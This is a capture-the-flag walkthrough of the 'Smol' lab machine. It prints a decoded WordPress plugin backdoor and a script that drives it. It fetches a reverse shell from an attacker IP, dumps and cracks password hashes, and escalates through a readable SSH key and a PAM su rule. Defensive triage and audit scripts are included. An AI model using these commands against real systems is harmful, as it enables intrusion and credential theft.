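The same decoding as a reusable triage script (an added example, not from the original post). It decodes every eval(base64_decode('...')) in a plugin file, resolves PHP's octal and hex string escapes to recover the real parameter name, and reports which WordPress hook reaches each function that contains a dangerous call. HELLO_PHP is a trimmed copy of the plugin source shown above; the function names and the crude brace-matching parser are this example's own. The hook report is what explains the behaviour in the next steps: the eval() is reachable only through admin_notices, not by requesting hello.php on its own.

```python
#!/usr/bin/env python3
"""Static triage of an eval(base64_decode()) backdoor in a WordPress plugin.
Added example; the regexes are deliberately simple and aimed at small
plugin files, not a full PHP parser."""
import base64
import re

# Trimmed copy of the hello.php shown above (lyrics and CSS shortened).
HELLO_PHP = r'''<?php
function hello_dolly_get_lyric() {
    $lyrics = "Hello, Dolly";
    return wptexturize( $lyrics );
}
function hello_dolly() {
    eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
    $chosen = hello_dolly_get_lyric();
    printf( '<p id="dolly">%s</p>', $chosen );
}
add_action( 'admin_notices', 'hello_dolly' );
function dolly_css() {
    echo "<style>#dolly { float: right; }</style>";
}
add_action( 'admin_head', 'dolly_css' );
'''

PHP_ESCAPE_RE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})|\\([nrtv\\"$])')
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
GET_KEY_RE = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\[\s*"((?:[^"\\]|\\.)*)"\s*\]')
FUNC_RE = re.compile(r"function\s+(\w+)\s*\(")
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"](\w+)['\"]\s*,\s*['\"](\w+)['\"]")
DANGER_RE = re.compile(r"\b(eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(")


def php_unescape(s):
    """Resolve the escapes PHP honours in double-quoted strings: octal
    (\\143), hex (\\x64) and the simple ones (\\n, \\", \\$ ...)."""
    simple = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "\\": "\\", '"': '"', "$": "$"}

    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8))
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return simple[m.group(3)]

    return PHP_ESCAPE_RE.sub(repl, s)


def decode_eval_payloads(src):
    """Decoded PHP hidden in every eval(base64_decode('...')) call."""
    out = []
    for b64 in EVAL_B64_RE.findall(src):
        b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
        out.append(base64.b64decode(b64).decode("utf-8", errors="replace"))
    return out


def request_keys(php):
    """Superglobal keys the code reads, escapes resolved: $_GET["\\143\\155\\x64"] -> ('GET', 'cmd')."""
    return sorted({(g, php_unescape(k)) for g, k in GET_KEY_RE.findall(php)})


def function_bodies(src):
    """Map each PHP function name to its body by brace counting (fine for
    plugin files whose strings contain balanced braces, as here)."""
    bodies = {}
    for m in FUNC_RE.finditer(src):
        start = src.index("{", m.end())
        depth, j = 0, start
        while j < len(src):
            if src[j] == "{":
                depth += 1
            elif src[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        bodies[m.group(1)] = src[start:j + 1]
    return bodies


def backdoor_paths(src):
    """For each function containing a dangerous call, the actions that fire it.
    A function hooked only to admin_* actions never runs when its file is
    requested directly, which is why hitting hello.php returned nothing."""
    hooks = {}
    for action, fn in HOOK_RE.findall(src):
        hooks.setdefault(fn, []).append(action)
    return {fn: hooks.get(fn, []) for fn, body in function_bodies(src).items()
            if DANGER_RE.search(body)}


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else HELLO_PHP
    for code in decode_eval_payloads(src):
        print("decoded:", code.strip())
        print("reads:  ", request_keys(code))
    print("dangerous functions -> hooks:", backdoor_paths(src))
```

Pointed at a whole plugins directory (one file at a time), the same three functions double as a quick backdoor sweep: decoded payloads, the parameter names they read, and whether the code path needs an authenticated admin page or is reachable anonymously.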
This is clearly a backdoor: whatever arrives in the cmd GET parameter is handed to system(), with the key written in escapes so a grep for "cmd" would miss it. Try using it to spawn a shell:
┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s "http://www.smol.hmv/wp-content/plugins/hello.php?cmd=wget+http://192.168.10.101:8888/revshell.sh+-O+/tmp/revshell.sh"
None of the other common commands produced any output either, so I started doubting whether it ran at all. Digging around further, it seemed to be nothing but a plugin that shows song lyrics, not useful at all...
Then I found where the plugin is actually triggered: the lyric is printed every time the admin dashboard loads. That is the missing piece. The eval() sits inside hello_dolly(), which is registered with add_action('admin_notices', ...), so it runs only while WordPress renders an admin page for a logged-in user. Requesting hello.php directly executes the file outside WordPress: it defines the functions and exits without calling any of them. If the dashboard shows the lyric, the backdoor is live and any wp-admin page accepts the cmd parameter, so the reverse shell can be triggered from the logged-in browser session:
There it is!
Now try command execution and a reverse shell. A one-liner pasted straight into the URL did not work; a likely reason is that characters such as &, ;, | and > in a raw query string are parsed by the browser and server and split the command unless they are URL-encoded. Staging a script and running it in two requests sidesteps that:
http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.10.101:8888/revshell.sh -O /tmp/revshell.sh
The request goes through; now execute the staged script:
http://www.smol.hmv/wp-admin/index.php?cmd=/bin/bash%20/tmp/revshell.sh
The shell comes back!
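The two-request staging above, driven from a script instead of the browser address bar (an added example, not from the original; standard library only). It URL-encodes the command, sends it with the logged-in session's Cookie header (copy the wordpress_logged_in_* and wordpress_* cookies from the browser after logging in; the value is an assumption here), brackets the command with random markers so its stdout can be cut out of the dashboard HTML, and returns None when the backdoor did not fire (e.g. session expired). SAMPLE_HTML is a constructed fragment for the offline check.

```python
#!/usr/bin/env python3
"""Run commands through the Hello Dolly backdoor via an authenticated
wp-admin page. Added example, stdlib only."""
import re
import secrets
import shlex
import sys
import urllib.parse
import urllib.request


def build_cmd_url(base, cmd, page="index.php"):
    """Put `cmd` in the query string of an admin page. urlencode() percent-encodes
    &, ;, |, > and spaces, which a raw one-liner in the address bar would
    otherwise hand to the server as separate parameters."""
    return f"{base.rstrip('/')}/wp-admin/{page}?" + urllib.parse.urlencode({"cmd": cmd})


def wrap_with_markers(cmd, start, end):
    """Bracket the command so its stdout can be located inside the page."""
    return f"echo {shlex.quote(start)}; {cmd}; echo {shlex.quote(end)}"


def extract_output(html, start, end):
    """Text between the markers, or None if the backdoor did not run."""
    m = re.search(re.escape(start) + r"\n?(.*?)\n?" + re.escape(end), html, re.S)
    return m.group(1) if m else None


def run_cmd(base, cookie, cmd, opener=urllib.request.urlopen):
    """Send one command with the admin session cookie and return its output (network I/O)."""
    start = "__" + secrets.token_hex(4) + "__"
    end = "__" + secrets.token_hex(4) + "__"
    req = urllib.request.Request(build_cmd_url(base, wrap_with_markers(cmd, start, end)),
                                 headers={"Cookie": cookie})
    with opener(req, timeout=15) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"), start, end)


# Constructed dashboard fragment: system() output lands right before the
# lyric paragraph that hello_dolly() prints.
SAMPLE_HTML = (
    '<div class="wrap">__a1__\n'
    'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
    '__b2__<p id="dolly"><span dir="ltr">Hello, Dolly</span></p></div>'
)

if __name__ == "__main__":
    if len(sys.argv) < 4:
        sys.exit("usage: dolly_cmd.py http://www.smol.hmv '<Cookie header>' 'id'")
    print(run_cmd(sys.argv[1], sys.argv[2], sys.argv[3]))
```

With this, the staged reverse shell above becomes two calls: one with the wget command, one with /bin/bash /tmp/revshell.sh; the second never returns output because the shell holds the request open, which is expected.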
Privilege Escalation
Stabilizing the Shell
The usual routine:
python3 -c 'import pty;pty.spawn("/bin/bash")'
# alternative: script /dev/null -c bash
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
# rows/columns taken from `stty size` on the kali side
stty rows 44 columns 189
Information Gathering
www-data@smol:/var/www/wordpress/wp-admin$ cd ~
www-data@smol:/var/www$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Mar 29 2024 .
drwxr-xr-x 13 root root 4096 Mar 29 2024 ..
drwxr-xr-x 2 root root 4096 Mar 29 2024 html
drwxr-x--- 5 www-data www-data 4096 Jun 7 02:03 wordpress
www-data@smol:/var/www$ cd html
www-data@smol:/var/www/html$ ls -la
total 24
drwxr-xr-x 2 root root 4096 Mar 29 2024 .
drwxr-xr-x 4 root root 4096 Mar 29 2024 ..
-rw-r--r-- 1 root root 10918 Mar 29 2024 index.html.default
-rw-r--r-- 1 root root 258 Mar 29 2024 index.php
www-data@smol:/var/www/html$ cd ../wordpress/
www-data@smol:/var/www/wordpress$ ls -la
total 252
drwxr-x--- 5 www-data www-data 4096 Jun 7 02:03 .
drwxr-xr-x 4 root root 4096 Mar 29 2024 ..
-rw-r--r-- 1 www-data www-data 523 Aug 16 2023 .htaccess
-rw-r--r-- 1 www-data www-data 405 Aug 16 2023 index.php
-rw-r--r-- 1 www-data www-data 19903 Jun 7 02:02 license.txt
-rw-r--r-- 1 www-data www-data 7425 Jun 7 02:02 readme.html
-rw-r--r-- 1 www-data www-data 7387 Jun 7 02:02 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Aug 16 2023 wp-admin
-rw-r--r-- 1 www-data www-data 351 Aug 16 2023 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 2323 Aug 16 2023 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 3336 Jun 7 02:02 wp-config-sample.php
-rw-r--r-- 1 www-data www-data 3008 Mar 29 2024 wp-config.php
drwxr-xr-x 8 www-data www-data 4096 Jun 7 02:03 wp-content
-rw-r--r-- 1 www-data www-data 5617 Jun 7 02:02 wp-cron.php
drwxr-xr-x 30 www-data www-data 16384 Jun 7 02:02 wp-includes
-rw-r--r-- 1 www-data www-data 2502 Aug 16 2023 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3937 Jun 7 02:02 wp-load.php
-rw-r--r-- 1 www-data www-data 51414 Jun 7 02:02 wp-login.php
-rw-r--r-- 1 www-data www-data 8727 Jun 7 02:02 wp-mail.php
-rw-r--r-- 1 www-data www-data 30081 Jun 7 02:02 wp-settings.php
-rw-r--r-- 1 www-data www-data 34516 Jun 7 02:02 wp-signup.php
-rw-r--r-- 1 www-data www-data 5102 Jun 7 02:02 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3205 Jun 7 02:02 xmlrpc.php
www-data@smol:/var/www/wordpress$ cat /etc/passwd | grep sh | cut -d: -f1
root
sshd
think
fwupd-refresh
xavi
diego
gege
www-data@smol:/var/www/wordpress$ ls -la /home/
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 2 diego internal 4096 Aug 18 2023 diego
drwxr-x--- 2 gege internal 4096 Aug 18 2023 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
Database Dump
Before moving on, note the home directories above: all four are mode 750 and group-owned by internal, so a shell as any member of that group can read the others' files. Now open the database with the credentials from wp-config.php:
www-data@smol:/var/www/wordpress$ mysql -u wpuser -pkbLSF2Vop#lw3rjDZ629*Z%G
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 524
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| wordpress |
+--------------------+
5 rows in set (0.00 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from wp_users;
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| 1 | admin | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin | admin@smol.thm | http://www.smol.hmv | 2023-08-16 06:58:30 | | 0 | admin |
| 2 | wpuser | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp | wp@smol.thm | http://smol.thm | 2023-08-16 11:04:07 | | 0 | wordpress user |
| 3 | think | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think | josemlwdf@smol.thm | http://smol.thm | 2023-08-16 15:01:02 | | 0 | Jose Mario Llado Marti |
| 4 | gege | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege | gege@smol.thm | http://smol.thm | 2023-08-17 20:18:50 | | 0 | gege |
| 5 | diego | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego | diego@smol.thm | http://smol.thm | 2023-08-17 20:19:15 | | 0 | diego |
| 6 | xavi | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi | xavi@smol.thm | http://smol.thm | 2023-08-17 20:20:01 | | 0 | xavi |
+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)
mysql> select user_nicename,user_login,user_pass from wp_users;
+---------------+------------+-----------------------------------------------------------------+
| user_nicename | user_login | user_pass |
+---------------+------------+-----------------------------------------------------------------+
| admin | admin | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 |
| wp | wpuser | $wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |
| think | think | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ |
| gege | gege | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 |
| diego | diego | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 |
| xavi | xavi | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ |
+---------------+------------+-----------------------------------------------------------------+
6 rows in set (0.00 sec)
Try cracking the hashes:
admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0
wpuser:$wp$2y$10$r/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m
think:$P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/
gege:$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
diego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
xavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN/
┌──(kali💀kali)-[~/temp/Smol]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (diego)
1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g/s 2372p/s 9992c/s 9992C/s lilmami503..lilmama_c
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session aborted
Cracking yields the password diego:sandiegocalifornia, but although the SSH service is running, login over SSH is denied for this account....
Reading credentials via shared group permissions to switch users
diego@smol:~$ ls -la
total 24
drwxr-x--- 2 diego internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 diego diego 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 diego diego 807 Feb 25 2020 .profile
-rw-r--r-- 1 root root 33 Aug 16 2023 user.txt
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:~$ cat user.txt
45edaec653ff9ee06236b7ce72b86963
diego@smol:~$ sudo -l
[sudo] password for diego:
Sorry, user diego may not run sudo on smol.
diego@smol:~$ whoami;id
diego
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:~$ ls -la ../
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 2 diego internal 4096 Aug 18 2023 diego
drwxr-x--- 2 gege internal 4096 Aug 18 2023 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
Earlier we noticed four users sharing the same group, so let's check whether any of their home directories hold useful information:
diego@smol:~$ cd ../gege
diego@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip
diego@smol:/home/gege$ cd ../think
diego@smol:/home/think$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:/home/think$ cd .ssh
diego@smol:/home/think/.ssh$ ls -la
total 20
drwxr-xr-x 2 think think 4096 Jun 21 2023 .
drwxr-x--- 5 think internal 4096 Jan 12 2024 ..
-rwxr-xr-x 1 think think 572 Jun 21 2023 authorized_keys
-rwxr-xr-x 1 think think 2602 Jun 21 2023 id_rsa
-rwxr-xr-x 1 think think 572 Jun 21 2023 id_rsa.pub
diego@smol:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
diego@smol:/home/think/.ssh$ cat authorized_keys
ssh-rsa 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 think@ubuntuserver
diego@smol:/home/think/.ssh$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl/wGAHYqhU3uTXVUbvj5yYUxsY/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver
diego@smol:/home/think/.ssh$ cd ../../xavi/
diego@smol:/home/xavi$ ls -la
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 xavi xavi 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 xavi xavi 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
We found a backup archive and a user whose readable SSH private key allows login; let's log in as that user first:
Passwordless su via the su PAM configuration
Information gathering shows:
think@smol:~$ ls -la
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
think@smol:~$ whoami;id
think
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)
think@smol:~$ cat /etc/group | grep dev
plugdev:x:46:
dev:x:1004:think,gege
think@smol:~$ cd ../gege
think@smol:/home/gege$ ls -la
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip
think and gege belong to the same group, so the intended path is presumably to pivot from think to gege, but there was no obvious lead. I uploaded linpeas.sh and ran it... it found nothing major. After reading some other people's write-ups, it turns out you can switch directly here, which means the configuration file was modified; let's take a look:
think@smol:/tmp$ cat /etc/pam.d/su | grep auth
auth sufficient pam_rootok.so
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think
# auth required pam_wheel.so
# auth sufficient pam_wheel.so trust
# auth required pam_wheel.so deny group=nosu
# The standard Unix authentication modules, used with
@include common-auth
This shows that think is a trusted caller for su to gege, so switch:
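As an added example (not part of the original write-up), the following script audits an /etc/pam.d/su auth stack for the pam_succeed_if pattern shown above and reports which account may su to which target without a password. The embedded sample is the stack from this box; on a real host the same functions would be fed the contents of /etc/pam.d/su.

```python
"""Audit /etc/pam.d/su for pam_succeed_if rules that grant password-less su."""
import re

# Constructed sample: the auth stack shown above in this box's /etc/pam.d/su
SAMPLE_PAM_SU = """\
auth sufficient pam_rootok.so
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think
# auth required pam_wheel.so
@include common-auth
"""

LINE_RE = re.compile(r"auth\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")
USER_RE = re.compile(r"\buser\s*=\s*(\S+)")


def parse_auth_lines(text):
    """Return (control, module, args) for every active 'auth' line, in file order."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@":  # skip comments and @include directives
            continue
        m = LINE_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2), m.group(3)))
    return rows


def find_passwordless_su(rows):
    """Return (caller, target) pairs where pam_succeed_if lets caller su to target
    without a password; target is '*' when no target restriction precedes the rule."""
    findings = []
    for i, (control, module, args) in enumerate(rows):
        # Only 'sufficient' + use_uid rules short-circuit authentication for a caller
        if module != "pam_succeed_if.so" or "use_uid" not in args or control != "sufficient":
            continue
        caller_m = USER_RE.search(args)
        if not caller_m:
            continue
        caller, target = caller_m.group(1), "*"
        # A preceding '[success=ignore default=1] pam_succeed_if.so user = X' gates
        # this rule on the target account being X (otherwise the rule is skipped).
        if i > 0:
            p_control, p_module, p_args = rows[i - 1]
            if (p_module == "pam_succeed_if.so" and "use_uid" not in p_args
                    and p_control.startswith("[") and "success=ignore" in p_control):
                t = USER_RE.search(p_args)
                if t:
                    target = t.group(1)
        findings.append((caller, target))
    return findings


if __name__ == "__main__":
    for caller, target in find_passwordless_su(parse_auth_lines(SAMPLE_PAM_SU)):
        print(f"{caller} can su to {target} without a password")
```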
Cracking the backup archive
Transfer the file to the local machine to see what was backed up; unzipping it, however, turns out to require a password.... Let's try cracking it:
┌──(kali💀kali)-[~/temp/Smol]
└─$ zip2john wordpress.old.zip > ziphash
-----------
┌──(kali💀kali)-[~/temp/Smol]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hero_gege@hotmail.com (wordpress.old.zip)
1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g/s 4306Kp/s 4306Kc/s 4306KC/s hesse..hermosa_jessy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With the password known, extract the archive:
┌──(kali💀kali)-[~/temp/Smol]
└─$ ll
total 31544
-rw-r--r-- 1 kali kali 4571 Jun 6 22:13 cms.log
-rw-rw-r-- 1 kali kali 274 Jun 7 02:37 hash
-rw------- 1 kali kali 2602 Jun 7 02:52 id_rsa
-rw-r--r-- 1 kali kali 517 Jun 6 22:13 reports.json
drwxr-xr-x 4 kali kali 4096 Jun 6 22:06 Result
-rw-rw-r-- 1 kali kali 50 Jun 7 01:17 revshell.sh
-rw-rw-r-- 1 kali kali 32266546 Aug 16 2023 wordpress.old.zip
-rw-rw-r-- 1 kali kali 1192 Jun 7 03:19 ziphash
┌──(kali💀kali)-[~/temp/Smol]
└─$ unzip wordpress.old.zip
Archive: wordpress.old.zip
creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:
inflating: wordpress.old/wp-config.php
inflating: wordpress.old/index.php
inflating: wordpress.old/wp-comments-post.php
inflating: wordpress.old/xmlrpc.php
inflating: wordpress.old/license.txt
inflating: wordpress.old/wp-login.php
creating: wordpress.old/wp-content/
extracting: wordpress.old/wp-content/index.php
creating: wordpress.old/wp-content/plugins/
----------------
inflating: wordpress.old/wp-admin/export.php
inflating: wordpress.old/wp-admin/options-writing.php
inflating: wordpress.old/wp-admin/users.php
inflating: wordpress.old/wp-admin/options-media.php
inflating: wordpress.old/wp-admin/edit.php
inflating: wordpress.old/wp-admin/import.php
inflating: wordpress.old/wp-admin/revision.php
Searching through it turns up a sensitive configuration file:
┌──(kali💀kali)-[~/temp/Smol]
└─$ cd wordpress.old
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ ll
total 228
-rw-r--r-- 1 kali kali 405 Aug 16 2023 index.php
-rw-r--r-- 1 kali kali 19915 Aug 16 2023 license.txt
-rw-r--r-- 1 kali kali 7399 Aug 16 2023 readme.html
-rw-r--r-- 1 kali kali 7211 Aug 16 2023 wp-activate.php
drwxr-xr-x 9 kali kali 4096 Aug 16 2023 wp-admin
-rw-r--r-- 1 kali kali 351 Aug 16 2023 wp-blog-header.php
-rw-r--r-- 1 kali kali 2323 Aug 16 2023 wp-comments-post.php
-rw-r--r-- 1 kali kali 2994 Aug 16 2023 wp-config.php
drwxr-xr-x 7 kali kali 4096 Aug 16 2023 wp-content
-rw-r--r-- 1 kali kali 5638 Aug 16 2023 wp-cron.php
drwxr-xr-x 27 kali kali 12288 Aug 16 2023 wp-includes
-rw-r--r-- 1 kali kali 2502 Aug 16 2023 wp-links-opml.php
-rw-r--r-- 1 kali kali 3927 Aug 16 2023 wp-load.php
-rw-r--r-- 1 kali kali 49441 Aug 16 2023 wp-login.php
-rw-r--r-- 1 kali kali 8537 Aug 16 2023 wp-mail.php
-rw-r--r-- 1 kali kali 25602 Aug 16 2023 wp-settings.php
-rw-r--r-- 1 kali kali 34385 Aug 16 2023 wp-signup.php
-rw-r--r-- 1 kali kali 4885 Aug 16 2023 wp-trackback.php
-rw-r--r-- 1 kali kali 3236 Aug 16 2023 xmlrpc.php
┌──(kali💀kali)-[~/temp/Smol/wordpress.old]
└─$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'xavi' );
/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
